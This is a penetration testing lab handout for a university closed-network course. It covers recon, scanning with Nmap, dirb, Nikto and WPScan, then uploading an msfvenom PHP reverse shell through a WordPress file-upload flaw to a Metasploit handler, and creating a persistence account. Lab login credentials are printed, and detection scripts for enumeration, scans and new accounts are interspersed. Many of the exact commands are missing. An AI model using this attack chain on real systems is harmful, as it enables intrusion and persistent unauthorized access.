Penetration Testing Lab PDF
In Section 2, you will use the Kali Linux virtual machine as an attacking machine to gain an understanding of a network by launching selected attacks against it. Based on the steps you perform, you will need to capture evidence and write a Penetration Testing Report (review the reference titled Pentest Report on how to write this report). You will report your findings to your organizational leadership by discussing information about the network, along with the identified vulnerabilities, and providing your recommendation to address the vulnerabilities.
In Section 1, you will need to answer questions that require the use of the internet. Since the lab VMs are within a closed network (meaning no direct connection to the Internet), you will need to use your Workspace or personal computer to answer those questions.
Lab Resources
Access Instructions:
To access the lab environment, use the “UMUC Digital Labs” document, which contains instructions for both the lab setup and other details relating to the UMUC virtual lab environment.
Username: StudentFirst
Password: Cyb3rl@b
VM # OS Type VM Name
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 1 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
http://www.youtube.com/watch?v=cnkLv_RE3EI
http://www.youtube.com/watch?v=TCPyoWHy4eA
Msfvenom Tutorial
https://www.youtube.com/watch?v=CtVH0MCv3DI
https://www.youtube.com/watch?v=ugHJMnI_C_E
Pentest Report
http://www.pentest-standard.org/index.php/Reporting
Weevely
https://github.com/epinna/weevely3/wiki/Install-and-first-run
Username: StudentFirst
Password: Cyb3rl@b
Phases of the penetration test:
Phase 1: Reconnaissance
Phase 2: Scanning
Phase 3: Attack and Gaining Access
Phase 4: Maintaining Access
Phase 5: Covering Tracks
Phase 1: Reconnaissance
During this phase, you can make use of any computer with internet access, including your workspace VM. You will not use any of the lab VMs. The first phase of Pentesting is reconnaissance, which is used to find everything you can learn about the target. Normally, you will use Google and other search engines to learn about the target. In addition to search engines, you should also use Internet tools such as whois or other similar tools to look up domains and to collect information. You must catalog all the information you collect. Below, you’ll see examples of information searches using Google (which can be done on your own desktop).
Google
There are many ways to search company-specific information on the web. This can be completed with the use of search engines such as Google, Bing, or Yahoo. Each of these search engines has advanced search options that can be used to search for files, words, and other details about a target company. For this exercise, you will use Google and its advanced search options. Follow the steps below to collect information about UMUC.
Step-by-Step Instructions
1. Start with a basic search for a specific site. This is completed with the search term of “site:” followed by the name of the
website. The following shows a search that targets umuc.edu. For example, using Google, type the following in the search
box:
site:umuc.edu
2. The next search operator looks for text that is found within the URL of a website. This search is performed by adding “inurl:” to the search string. For this search, you will look for all pages that contain cybersecurity within the URL. For example, using Google, type the following in the search box:
site:umuc.edu inurl:cybersecurity
3. The next search will look for the file types that can be found on a web server. This search is done with the use of the
command “filetype:” followed by the file extension. For example, using Google, type the following in the search box:
site:umuc.edu filetype:pdf
4. The next search will look for text that is found on a web page. This search is done with the command of “intext:” followed
by the text to search for. For example, using Google, type the following in the search box:
5. Outside of using these high-level search commands, you can also combine the advanced searches. Next, you will combine
the use of “intext” and “filetype.” For example, using Google, type the following in the search box:
Lab Questions
Using the tutorial above, respond to the following questions (and put them in your lab report):
1. Perform three advanced searches, state what you were searching for, and then take a screenshot of each search.
2. For each of the searches, why did the results change? How can you combine the searches to narrow the results?
3. How can the search techniques above be used by both black hat and white hat hackers?
4. What type of information would you look for when performing information gathering?
6. Research two other search engines and provide the details to conduct the same type of information gathering. Provide the search results, what you searched for, and a screenshot.
7. You were conducting information gathering on a company website; however, no search engine provided any details. After reviewing the website, you saw an email address with a different domain than that of the website. How can this be used?
Phase 2: Scanning
The second phase of penetration testing is scanning. This is when you use scanning tools such as dirb, Nmap, Nikto, and others to collect additional useful information. The scanning phase will help you to identify IP addresses, ports, operating systems, plugins, and other details. Some of the tools that we will be using in this section are:
dirb
The first tool in your arsenal is dirb. This tool is used to identify both known and unknown directories of a website. The tool uses a file called a wordlist to initiate web requests to a website in order to identify its directories. Dirb is used by both black hat and white hat hackers.
To better understand the flags and arguments found in dirb and other tools, you should always start by looking at the help information provided by the tool. To view the dirb help information with Kali Linux, open the terminal and enter “dirb” at the command prompt. Review the output to familiarize yourself with the tool.
The dirb help is broken down into four different sections: NOTES, HOTKEYS, OPTIONS, and EXAMPLES. The NOTES section of the help file refers to the content above it and explains how to provide commands to dirb. HOTKEYS are used to perform different actions during a scan. OPTIONS are used to tell dirb to try different options during a scan. The EXAMPLES section provides examples of how to write the commands. The screenshot below shows the command which was used to view the help information and a small section of the output:
Please review the flags or options described within the output of the dirb command.
-a option
The first option on the list is -a. This is used to change the user agent string. The user agent string is a set of data that tells the server what type of system requested the information. Depending on the browser you use, you may see different user agent strings. The point of this option is to mask the use of dirb and to make it appear as if a browser requested the content.
-c option
The next option on the list is the cookie string. The cookie string can be used for a few reasons. The information could have been collected with the use of cross-site scripting, or provided by the client.
-i option
The next option is case insensitivity. This option tells dirb to try more requests based on possible character case. For example, if your wordlist is only in lowercase, the scan may not return a result for uppercase letters. The same can be said about the other way around.
-r and -R options
The next set of options controls recursive scans. The -r option tells dirb not to scan recursively, that is, not to enter new directories. However, -R tells dirb to scan the new directories but to ask before entering each one.
-X option
The last option we will review is the -X option. This option is used to define extensions to also add to the scan. What happens is that dirb takes each word in the wordlist and adds the extensions to the end of that word.
The dirb help shows four different parts needed for the command to execute. The first part, dirb, is the text used to start dirb. The next part, <url_base>, is the URL that is being brute-forced. The next part is the wordlist to use for the scan. For the wordlist option to work, you need to provide the directory location of the wordlist file. The remaining options were explained earlier.
With dirb, you can also run default scans. A default scan reverts to a default setting, which tells dirb to use a common wordlist and to automatically enter new directories. The basic or default scan is the one used when no wordlist or other options are provided to dirb, and it is the one most often used in dirb scans. The following is an example of the command:
Note: site_to_test.com is a placeholder for the actual website, so you need to change this to the real and specific website against which you will be testing.
dirb http://site_to_test.com
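From the defender's side, a dirb run shows up in the web server's access log as a burst of requests for paths that do not exist, all from one client, and when -X is used the same base name appears again with each extension appended. The Python below is an added example, not part of the lab or of dirb itself: it detects that pattern over a few constructed Apache-style log lines (the addresses, paths and timestamps are made up for the demonstration).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (Apache combined-log style) for this
# demonstration only; not a real capture. 192.168.10.101 walks a wordlist
# against the site the way dirb does; 192.168.10.55 is ordinary browsing.
SAMPLE_LOG = """\
192.168.10.101 - - [25/Mar/2020:17:21:01 +0000] "GET /admin HTTP/1.1" 404 196
192.168.10.101 - - [25/Mar/2020:17:21:01 +0000] "GET /backup HTTP/1.1" 404 196
192.168.10.101 - - [25/Mar/2020:17:21:01 +0000] "GET /backup.php HTTP/1.1" 404 196
192.168.10.101 - - [25/Mar/2020:17:21:02 +0000] "GET /cgi-bin/ HTTP/1.1" 403 199
192.168.10.101 - - [25/Mar/2020:17:21:02 +0000] "GET /config HTTP/1.1" 404 196
192.168.10.101 - - [25/Mar/2020:17:21:02 +0000] "GET /config.txt HTTP/1.1" 404 196
192.168.10.101 - - [25/Mar/2020:17:21:03 +0000] "GET /wordpress/ HTTP/1.1" 200 5120
192.168.10.101 - - [25/Mar/2020:17:21:03 +0000] "GET /wp-admin HTTP/1.1" 404 196
192.168.10.101 - - [25/Mar/2020:17:21:03 +0000] "GET /test HTTP/1.1" 404 196
192.168.10.101 - - [25/Mar/2020:17:21:04 +0000] "GET /test.php HTTP/1.1" 404 196
192.168.10.55 - - [25/Mar/2020:17:21:02 +0000] "GET / HTTP/1.1" 200 4096
192.168.10.55 - - [25/Mar/2020:17:21:05 +0000] "GET /about HTTP/1.1" 200 2048
192.168.10.55 - - [25/Mar/2020:17:21:40 +0000] "GET /favicon.ico HTTP/1.1" 404 196
"""

# Client IP, timestamp, request path and status code of a combined-log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, path, status) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def detect_enumeration(log_text, window_seconds=10, min_misses=8):
    """Flag clients that request many distinct missing or forbidden paths
    within a short window.  Returns {ip: {"distinct_misses": n,
    "extension_pairs": k}}; extension_pairs counts paths that were also
    requested with a suffix appended, the signature of dirb's -X option."""
    misses = defaultdict(list)            # ip -> [(timestamp, path)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, status = rec
        if status in (403, 404):          # the responses a wordlist walk mostly gets
            misses[ip].append((ts, path))

    window = timedelta(seconds=window_seconds)
    findings = {}
    for ip, events in misses.items():
        events.sort()
        # Sliding window: largest number of distinct missed paths in any window.
        best = 0
        for i, (start, _) in enumerate(events):
            paths = {p for t, p in events[i:] if t - start <= window}
            best = max(best, len(paths))
        if best < min_misses:
            continue
        all_paths = {p for _, p in events}
        ext_pairs = sum(
            1 for p in all_paths
            if "." in p.rsplit("/", 1)[-1] and p.rsplit(".", 1)[0] in all_paths
        )
        findings[ip] = {"distinct_misses": best, "extension_pairs": ext_pairs}
    return findings


if __name__ == "__main__":
    for ip, info in detect_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {info['distinct_misses']} distinct misses in 10 s, "
              f"{info['extension_pairs']} base/extension pairs (dirb -X pattern)")
```

The thresholds are starting points: a busy site with broken links also produces 404s, so tune window_seconds and min_misses against your own baseline before alerting on them.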
Nikto
Nikto is a web application vulnerability scanner used to identify vulnerabilities in websites and web applications. Like dirb, Nikto has its own set of flags, and these flags can be reviewed by providing the -help flag. The next image shows the full list of the help commands:
Like dirb, these flags are used by Nikto to perform different functions. However, the main difference when you review the help content of Nikto is the flags that contain a plus symbol. These plus symbols designate additional values needed for each flag.
We will now review each of the flags.
1 - Show redirects: This option tells Nikto to show when the web server has a redirect to some other location.
2 - Show cookies received: This option tells Nikto to show the cookies used by the web server.
3 - Show all 200/OK responses: This option tells Nikto to show all 200 response codes from the web server.
4 - Show URLs which require authentication: This option tells Nikto to show all URLs that require authentication on the web server.
D - Debug Output: This option shows the data that is sent to the web server.
E - Display all HTTP errors: This option shows all HTTP-based error messages and codes.
P - Print progress to STDOUT: This option shows the status while Nikto is running the scan.
V - Verbose Output: This option shows or lists everything that Nikto is doing while it is scanning the web server.
-Format+ - This option tells Nikto which file format to use for the output of the results. The full option list is documented at https://cirt.net/nikto2-docs/options.html
To run a scan, you would type this within the terminal:
nikto -h 10.0.250.200
While Nikto is running, you will see the following within the terminal:
WPScan
The next tool you will examine is WPScan. This tool is used for scanning WordPress websites. You need to familiarize yourself with the command options. Below is the command to access the tool:
Nmap
Nmap is a security scanner that is used to discover hosts and services on a computer network. Based on network conditions, it sends out packets with specific information to the target host device and then evaluates the responses. To hack into a computer system, an attacker must target a machine and identify which ports the machine is listening on. The attacker can sweep networks and locate vulnerable targets using scanners such as Nmap. Nmap also uses TCP stack fingerprinting to accurately determine the type of system being scanned.
Nmap is flexible in specifying targets. Simply scan one host or scan entire networks by pointing Nmap to the network address with a CIDR "prefix/mask" appended to it. In addition, Nmap will allow you to specify networks with wild cards, such as 192.168.10.*, which is the same as 192.168.10.0/24. For example, in our case, we can indicate the range of target hosts as follows:
192.168.10.103-106
by Nmap to be up. In this example, you could scan all hosts on the 192.168.10.0 network.
Both Zenmap, the official Nmap Graphical User Interface (GUI), and the Nmap command-line interface (CLI) will allow you to enter this command and run the scan. Sometimes you may merely want to check the availability of a system without sending ICMP echo requests, which may be blocked by some sites. In this case, a TCP "ping" sweep can be used to scan a target's network. A TCP "ping" will send an ACK to each machine on a target network. Machines that are up should respond with a TCP RST. To use the TCP "ping" option with a ping scan, include the "-PT" flag to target a specific port on the network you're probing. In our example, we'll use port 80 (http), which is the default, and it will probably be allowed through the target's border routers and possibly even its firewall.
Note that the targeted port does not need to be open on the hosts that are being probed to determine if the machine is up or
not. We launch this type of scan as follows:
When a potential intruder knows which machines on the target's network are alive, typically the next step is port scanning.
TCP Connect
When an attacker is using TCP connect scans, Nmap will use the connect() system call to open connections to interesting ports on the target host and complete the three-way TCP handshake. The probe is easily detected by the target host. Logs on the host machine will show these ports being opened by the attacker. A TCP connect scan is used with the "-sT" flag as:
Stealth Scanning
What if an attacker wants to scan a host without being logged on the target machine? TCP SYN scans are less prone to logging on the target's machine, because a full handshake never completes. A SYN scan starts by sending a SYN packet, which is the first packet in TCP negotiation (three-way handshake). Any open port will respond with a SYN|ACK, as it should. However, the attacker sends a RST instead of an ACK, which terminates the connection. The advantage is that the three-way handshake never completes, and fewer sites will log this type of probe. Ports that are closed will respond to the initial SYN with a RST, allowing Nmap to determine that the host isn't listening on that port. This command might require root privileges, which could be obtained by trying the "sudo" command at the knoppix prompt. The "-sS" flag will launch a SYN scan against a host or network as:
Although SYN scans are more likely to go unnoticed, they can still be detected by some intrusion detection countermeasures. The Stealth FIN, Xmas Tree, and Null scans are used to evade packet filters and firewalls that may be watching for SYN packets directed toward restricted ports. These three scans should return a RST for closed ports, whereas open ports should drop the packet. A FIN "-sF" scan will send a FIN packet to each port, whereas the Xmas Tree scan "-sX" turns on the FIN, URG, and PUSH flags, and a Null scan "-sN" turns off all flags. Because of Microsoft's noncompliance with TCP standards, the FIN, Xmas Tree, and Null scans are only effective on non-Microsoft operating systems.
UDP Scanning
Using the UDP scan "-sU", an attacker can determine what ports are open to UDP on a host. Nmap will send a 0-byte UDP packet to each port. If the host returns a "port unreachable" message, that port is considered closed. This method can be time-consuming because most UNIX hosts limit the rate of ICMP errors. Fortunately, Nmap detects this rate and slows itself down, so as not to overflow the target with messages that would have been ignored. Launch a UDP scan as follows:
OS Fingerprinting
Often, an intruder may be more familiar with exploits for a particular operating system and may be looking for machines to compromise easily. OS fingerprinting is used to determine which OS is running on the host. A common option is TCP/IP fingerprinting with the "-O" option to determine the remote operating system. This has to be combined with a port scan and not a ping scan. Nmap accomplishes this by sending different types of probes to the host, which can narrow down the target operating system. Fingerprinting the TCP stack includes such techniques as FIN probing to see what kind of response the target has, BOGUS flag probing to see the remote host's reaction to undefined flags sent with a SYN packet, TCP Initial Sequence Number (ISN) sampling to find patterns in ISN numbers, as well as other methods of determining the remote operating system.
The TCP Sequence Prediction tells us how difficult TCP sequence number prediction is for the remote host. This is valuable to an attacker looking for hosts that can be vulnerable to session hijacking.
Other Options
-P0 Do not try to ping hosts at all before scanning them. Since Nmap will ping a target with both TCP "ping" and ICMP echo before attempting a port scan, sites blocking ICMP and TCP probes will not be scanned by default.
"-v" This is the verbose option, which can be used with all types of scans. You can use this flag to get more information about the target's machine.
The ability to target specific ports is accomplished with the "-p" option. For instance, if an attacker wanted to probe your web server for ftp (port 21), telnet (port 23), DNS name service (port 53), and http (port 80), and also wanted to know the OS you were using, the attacker might try the SYN scan:
For a complete list of the options for Nmap, you can see the Nmap manual at http://www.insecure.org/nmap
Ping Sweeping
ICMP ping         # sudo nmap -sP “host IP address”
TCP ping          # sudo nmap -sP -PT80 “host IP address”
Port Scanning
TCP connect       # sudo nmap -sT “host IP address”
Stealth scanning  # sudo nmap -sS “host IP address”
UDP scanning      # sudo nmap -sU “host IP address”
Stealth FIN       # sudo nmap -sF “host IP address”
Xmas Tree         # sudo nmap -sX “host IP address”
Null scan         # sudo nmap -sN “host IP address”
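On the wire, each scan type listed above has its own TCP flag signature, and that signature is what an intrusion detection system keys on. The Python below is an added defender-side example, not part of the lab or of Nmap: it reads constructed tcpdump-style packet summaries (the addresses are made up, and the one-letter flag format is an assumption of this example) and labels half-open, connect, Xmas Tree, Null and ACK ping-sweep probes by tracking which side finished the handshake. It also knows the FIN scan, which the sample does not exercise.

```python
import re
from collections import defaultdict

# Constructed packet summaries for this demonstration only (not a real capture).
# Format: "<n> <src>:<sport> > <dst>:<dport> <flags>", using tcpdump flag letters
# S=SYN A=ACK F=FIN R=RST P=PSH U=URG, and "." when no flags are set.
SAMPLE_PACKETS = """\
1 192.168.10.101:33000 > 192.168.10.103:21 S
2 192.168.10.103:21 > 192.168.10.101:33000 SA
3 192.168.10.101:33000 > 192.168.10.103:21 R
4 192.168.10.101:33000 > 192.168.10.103:22 S
5 192.168.10.103:22 > 192.168.10.101:33000 SA
6 192.168.10.101:33000 > 192.168.10.103:22 R
7 192.168.10.101:33000 > 192.168.10.103:23 S
8 192.168.10.101:44001 > 192.168.10.104:21 S
9 192.168.10.104:21 > 192.168.10.101:44001 SA
10 192.168.10.101:44001 > 192.168.10.104:21 A
11 192.168.10.101:44002 > 192.168.10.104:22 S
12 192.168.10.104:22 > 192.168.10.101:44002 SA
13 192.168.10.101:44002 > 192.168.10.104:22 A
14 192.168.10.101:44003 > 192.168.10.104:23 S
15 192.168.10.101:55000 > 192.168.10.105:21 FPU
16 192.168.10.101:55000 > 192.168.10.105:22 FPU
17 192.168.10.101:55000 > 192.168.10.105:80 FPU
18 192.168.10.101:56000 > 192.168.10.106:21 .
19 192.168.10.101:56000 > 192.168.10.106:22 .
20 192.168.10.101:56000 > 192.168.10.106:80 .
21 192.168.10.101:57000 > 192.168.10.103:80 A
22 192.168.10.101:57000 > 192.168.10.104:80 A
23 192.168.10.101:57000 > 192.168.10.105:80 A
24 192.168.10.101:57000 > 192.168.10.106:80 A
"""

PKT_RE = re.compile(r"^\d+ (?P<src>[\d.]+):(?P<sport>\d+) > "
                    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<flags>[SAFRPU.]+)$")
# First-packet flag patterns that identify the probe type on their own.
PROBE_NAMES = {"": "Null scan (-sN)", "F": "FIN scan (-sF)", "FPU": "Xmas Tree scan (-sX)"}


def parse_packet(line):
    """Return (src, sport, dst, dport, flags) with flags sorted, or None."""
    m = PKT_RE.match(line)
    if not m:
        return None
    flags = "" if m["flags"] == "." else "".join(sorted(m["flags"]))
    return m["src"], int(m["sport"]), m["dst"], int(m["dport"]), flags


def track_flows(text):
    """Key flows by the client's 4-tuple: first flags sent (the probe) and
    whether the client later completed the handshake with a bare ACK."""
    flows = {}
    for line in text.splitlines():
        rec = parse_packet(line)
        if rec is None:
            continue
        src, sport, dst, dport, flags = rec
        key, rkey = (src, sport, dst, dport), (dst, dport, src, sport)
        if key in flows:                  # later packet from the client
            if "A" in flags and "S" not in flags and "R" not in flags:
                flows[key]["client_ack"] = True
        elif rkey not in flows:           # not a server reply, so a new probe
            flows[key] = {"probe": flags, "client_ack": False}
    return flows


def classify_scans(text, min_ports=3, min_hosts=3):
    """Return sorted (src, target, scan type, count) tuples: one per source that
    sent the same probe to min_ports+ ports on a host, plus one per source that
    sent bare ACKs to one port on min_hosts+ hosts (TCP ping sweep)."""
    by_pair = defaultdict(lambda: defaultdict(set))   # (src, dst) -> probe -> ports
    completed = set()                                 # (src, dst) with a full handshake
    sweep = defaultdict(set)                          # (src, dport) -> hosts sent bare ACK
    for (src, sport, dst, dport), f in track_flows(text).items():
        by_pair[(src, dst)][f["probe"]].add(dport)
        if f["probe"] == "S" and f["client_ack"]:
            completed.add((src, dst))
        elif f["probe"] == "A":
            sweep[(src, dport)].add(dst)
    findings = []
    for (src, dst), probes in by_pair.items():
        for probe, ports in probes.items():
            if len(ports) < min_ports:
                continue
            if probe == "S":
                # connect() finishes the handshake; -sS answers the SYN/ACK with RST.
                label = ("TCP connect scan (-sT)" if (src, dst) in completed
                         else "SYN half-open scan (-sS)")
            elif probe in PROBE_NAMES:
                label = PROBE_NAMES[probe]
            else:
                continue                  # bare ACKs are reported as a sweep below
            findings.append((src, dst, label, len(ports)))
    for (src, dport), hosts in sweep.items():
        if len(hosts) >= min_hosts:
            findings.append((src, f"port {dport}", "TCP ping sweep (-PT)", len(hosts)))
    return sorted(findings)


if __name__ == "__main__":
    for src, target, label, n in classify_scans(SAMPLE_PACKETS):
        print(f"{src} -> {target}: {label} ({n} ports/hosts)")
```

The -sS versus -sT distinction depends on seeing the client's third packet, so a sensor that captures only one direction can report a SYN probe but not which of the two it was.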
Remember that all of the information collected during the scanning phase needs to be recorded and saved. The first two phases of an attack determine how you will attack the network. After you collect the information, you can use the Internet to search for possible exploits. You can use different software tools, and other data that would help you successfully conduct the Pentesting.
Prior to starting the next phase, you will first develop an attack scenario. Ideally, you will recreate the target network in a sandbox environment based on the collected information. You will then test the attack scenario in the sandbox environment on the modeled network. This is to avoid accidental security incidents such as a DoS attack on your own network.
Burp Suite
Burp Suite is a unique tool, which can be used within many different areas of penetration testing. The tool allows for scanning, crawling, and proxying requests. There are two different versions of Burp Suite: paid and free. The free version does not have scanning capabilities, whereas the paid version does. The screenshot below shows the Burp Suite user interface.
Along the top of the screen, you will see 12 different tabs, namely Target, Proxy, Spider, Scanner, Intruder, Repeater, Decoder, Comparer, Extender, Options, and Alerts.
The Target tab - Under Target, you have two more buttons, Site Map and Scope. Site Map shows you the site map of hosts that Burp Suite saw traffic for. Scope allows you to define which systems are in or out of scope.
The Proxy tab - The proxy part of Burp Suite allows you to capture traffic as it is leaving your host and modify the traffic as it is going to the server. To use this part of Burp Suite, set your browser to use Burp Suite as a proxy.
An exploit is the means by which an attacker takes advantage of a flaw within a system, an application, a service, or a network device such as a web server. An attacker uses an exploit to attack a system in a way that results in a compromise by running an arbitrary payload when triggered by the victim. You can watch the videos from the links provided in the reference section of this document to learn more about the tools associated with Kali Linux.
NIXATK01 (Kali)
Username: StudentFirst
Password: Cyb3rl@b
Before you clone the website, create a new folder on the Desktop of your attack VM, NIXATK01.
Note: You can open it from two different locations. The first location is at the bottom of the screen on the .
The second location is from the Application menu at the top left of the screen. The icon looks the same as found within the dock.
$ cd Desktop/website_clone
$ pwd
d. Run the HTTrack tool to clone the website using the following command:
Note: When you run the above command, you may see the following error message. If this happens, do not be alarmed; this is normal within this environment.
Note: When you run the above command, you have to enter the password for StudentFirst (Cyb3rl@b), but no characters will show up on the screen when typing. It may seem like nothing is being entered, but the characters are being entered.
See the figure below for the expected output of the httrack command:
After HTTrack has completed, go to the folder that you created on the desktop and open the index.html file (double click on the index.html file in the file system). You will see a website that displays the message, “You have gone to the wrong location”. This means that the website uses a different directory for the home directory.
Next, open the browser and go to the www.acme.com website (http://www.acme.com/). You should see the clone of your original page. Now that the website is open, right-click on the webpage and select View page source. Do you see any plain text message that resembles the warning message received above?
a. Perform a port scan (in a terminal window) using the following command (enter the password for StudentFirst (Cyb3rl@b) if you are prompted to):
Based on what you learned from the Nmap scan of the webserver, answer the following questions:
Step 2 - Identify the directories of the first webserver (www.acme.com) website by using the dirb tool.
a. Type the following command (in a terminal window) to scan the website with dirb (enter the password for StudentFirst (Cyb3rl@b) if you are prompted to):
What directories and files were identified by the dirb scan? Include your findings in the final report.
After identifying the directories of the webserver with the dirb scan, you next use Nikto to explore further.
a. Type the following command (in a terminal window) to start the scan (enter the password for StudentFirst (Cyb3rl@b) if you are prompted to):
The screenshots below show the output of the Nikto scan. Pay close attention to the server information (i.e. Target IP, Hostname, Port used, type of server, etc.).
After the Nikto scan has completed, address the following and include your answers in the final report.
1. Compare the Nmap and Nikto scan results while focusing on the port numbers reported by the two scans.
3. Select three different OSVDB entries found within the scan. Do a Google search for the three that you selected. Explain any information that you found about those OSVDB entries.
Now that you have determined that the webserver is running WordPress, use WPScan for further exploration.
Run the following command (in a terminal window) to start the WPScan of the webserver (enter the password for StudentFirst (Cyb3rl@b) if you are prompted to):
Note: WPScan will ask you if you want to update the scanner. Type N for no and hit Enter. The screenshot below displays the “wpscan” scan results.
From the output of “WPScan”, notice that each line item begins with a red, yellow, or green plus sign. Red plus signs mean that the webserver has some vulnerabilities. Review the details of each line item and answer the following questions:
3. Do you see any vulnerabilities that allow remote code execution or arbitrary file upload? Are there any other red alerts?
5. How is the vulnerability with the highest risk on the list exploited?
Now that you have identified vulnerabilities existing on the webserver with the previous scans, you can begin exploiting the network using some of these vulnerabilities.
The WPScan revealed that WordPress has an “Arbitrary File Upload” vulnerability as seen in the screenshot below. You can take advantage of this vulnerability to upload a malicious payload that will be used to compromise the webserver.
In the steps that follow, you will create a listener on the Kali VM, upload a php shell to the webserver, and execute the shell to compromise the webserver.
To create the shell, you will use the msfvenom command to create the file (payload) that needs to be uploaded to the webserver (the msfvenom command is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. It will create a payload that will be used in a social engineering attack).
a. On your NIXATK01 attacking machine (Kali VM), type the following command in the terminal:
After successfully executing the above command, you should get the following output:
You will edit the produced “msfvenom.php” file to add php open and close tags at the start and the end of the file. This makes the “msfvenom.php” file a complete php file. Follow the steps below.
a. Right click on the “msfvenom.php” file on the desktop and select “Open with Leafpad”.
b. When the file opens in Leafpad, type <?php at the beginning and ?> at the end of the file.
The content of the file after editing is depicted in the screenshot below:
Using social engineering techniques, the attacker delivers malicious code to potential victims and coerces them into executing this code on their local machines. Typically, social engineering attacks utilize delivery techniques such as email, USB drives, phone calls, or even visiting a physical location onsite. For example, using an email, an attacker can deliver malicious files and other applications containing executable code that can be unknowingly installed by users by clicking on certain links in an email, or launching certain applications with embedded malicious code.
In this exercise, we will deliver the malicious code (msfvenom.php) to the webserver (the target machine) using the following steps:
a. From the desktop of your NIXATK01 VM, double click and open the “Lab Resources” folder.
c. Click on the “Download Project resources” shortcut to get to the “CST630 Project Resources” page.
d. Under “Project 1”, click on WP Exploit [www.acme.com (http://www.acme.com/)] to get to the upload page.
e. Once on the upload page, click on the “Browse...” button and select the msfvenom.php file located on the desktop of your VM.
f. After the file is selected from your desktop, click on the “upload!” button.
g. When the file is successfully uploaded, you will see the following message displayed:
{"success":true,"fileName":"\/\/\/msfvenomtest.php"}
After the file is uploaded, make sure you can see it within the directory listing on the web server.
a. Browse to the upload directory by using the following URL from your NIXATK01 VM: http://www.acme.com/wordpress/wp-content/uploads
a. Open a terminal window and type the following command to open Metasploit:
$ sudo msfconsole
If prompted, enter the “StudentFirst” account password (Cyb3rl@b). After Metasploit has successfully loaded, you should see a screen similar to the one below:
b. Enter the following commands (without the “msf >” prompt) to set up the handler:
c. Verify the current configuration after setting the payload by typing the following command:
d. Type the following commands (without the “msf >” prompt) to set the LHOST and LPORT payload options.
msf > set lhost 192.168.10.101
msf > set lport 80
msf > show options
You will see the following in the terminal window. This will let you know that the listener has been created and Metasploit is waiting for a call-back session from triggering the payload.
g. Go to the upload directory and click on the “php” file that you earlier uploaded to the webserver (in the web browser).
Note: After you click on the php file, you should get the call back to your handler to establish a meterpreter session as shown in the screenshot below.
You will know that you have a call back when you see “Meterpreter session 1 opened” as seen in the screenshot above.
Now that you have the call back, run a few checks to see what level of access you have and obtain some system specific information.
Note: Use the “help” command to get additional information about the Core commands, File System Commands, and Networking Commands available to you once the meterpreter session is established.
b. Use the shell command to drop your current meterpreter session into a system command shell.
Note: The number of channels created (i.e. Channel 0 created, Channel 1 created…) as seen in the screenshots above is related to how many times you use the shell command during the meterpreter session.
Create a user named bob and set the password to bob. This user account (“anchor” account) is used by the hacker to gain additional access, such as privilege escalation, and to pivot to different parts of the internal network.
a. In the current session window, type and enter the following command to create the user bob (after entering the command
below, enter the command in part b without waiting for a response from the system, since the system will not return one):
b. Now, set the password for the user “bob” to bobpass with the following command:
Note:
1. The above command tells the system to set the password for bob. After entering the command, you will be prompted to
provide the desired password; enter “bobpass” for the password and re-enter it to confirm.
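From the defender's side, the creation of an anchor account like this is visible in the host's authentication log. The following Python script is added here as an example and is not part of the original lab material: it scans auth.log lines for a new-account event, a password change and any SSH login using that account, and reports the accounts that match. The sample log lines are constructed (hostname, PIDs and timestamps are made up); the “new user:” and “password changed for” message formats follow what the shadow-utils useradd and pam_unix write on Debian-family systems.

```python
"""Flag locally created accounts that were immediately given a password
and/or used for an SSH login, from syslog-style auth.log lines.
Added example for this lab (not from the original material).  The sample
log text below is constructed."""
import re
from typing import Dict, List

# Constructed sample: ordinary sshd noise, then a new account, a password
# change and an interactive login with the new account.
SAMPLE_AUTH_LOG = """\
Mar 25 17:20:01 nixtgt01 sshd[2101]: Accepted publickey for StudentFirst from 192.168.10.101 port 51022 ssh2
Mar 25 17:21:10 nixtgt01 useradd[2190]: new group: name=bob, GID=1001
Mar 25 17:21:10 nixtgt01 useradd[2190]: new user: name=bob, UID=1001, GID=1001, home=/home/bob, shell=/bin/bash
Mar 25 17:21:42 nixtgt01 passwd[2203]: pam_unix(passwd:chauthtok): password changed for bob
Mar 25 17:25:03 nixtgt01 sshd[2311]: Accepted password for bob from 192.168.10.101 port 51100 ssh2
"""

# Message formats as written by useradd, pam_unix (passwd) and sshd.
NEW_USER_RE = re.compile(
    r"useradd\[\d+\]: new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+)")
PASSWD_RE = re.compile(
    r"passwd\[\d+\]: pam_unix\(passwd:chauthtok\): password changed for (?P<name>\S+)")
SSH_LOGIN_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<name>\S+) from (?P<src>\S+)")


def find_anchor_accounts(log_text: str) -> List[Dict]:
    """Return one record per account that was created in this log window and
    then either had its password set or logged in over SSH.  An account that
    appears outside normal provisioning and is used interactively right away
    is the pattern the lab calls an 'anchor' account."""
    created: Dict[str, Dict] = {}
    for line in log_text.splitlines():
        m = NEW_USER_RE.search(line)
        if m:
            created[m["name"]] = {"name": m["name"], "uid": m["uid"],
                                  "password_set": False, "ssh_logins": []}
            continue
        m = PASSWD_RE.search(line)
        if m and m["name"] in created:
            created[m["name"]]["password_set"] = True
            continue
        m = SSH_LOGIN_RE.search(line)
        if m and m["name"] in created:
            created[m["name"]]["ssh_logins"].append(f"{m['method']} from {m['src']}")
    # Accounts that were only created (for example by a package install)
    # are not reported; only those that were then activated.
    return [r for r in created.values() if r["password_set"] or r["ssh_logins"]]


if __name__ == "__main__":
    for rec in find_anchor_accounts(SAMPLE_AUTH_LOG):
        print(f"suspect account {rec['name']} (uid {rec['uid']}): "
              f"password set={rec['password_set']}, logins={rec['ssh_logins']}")
```

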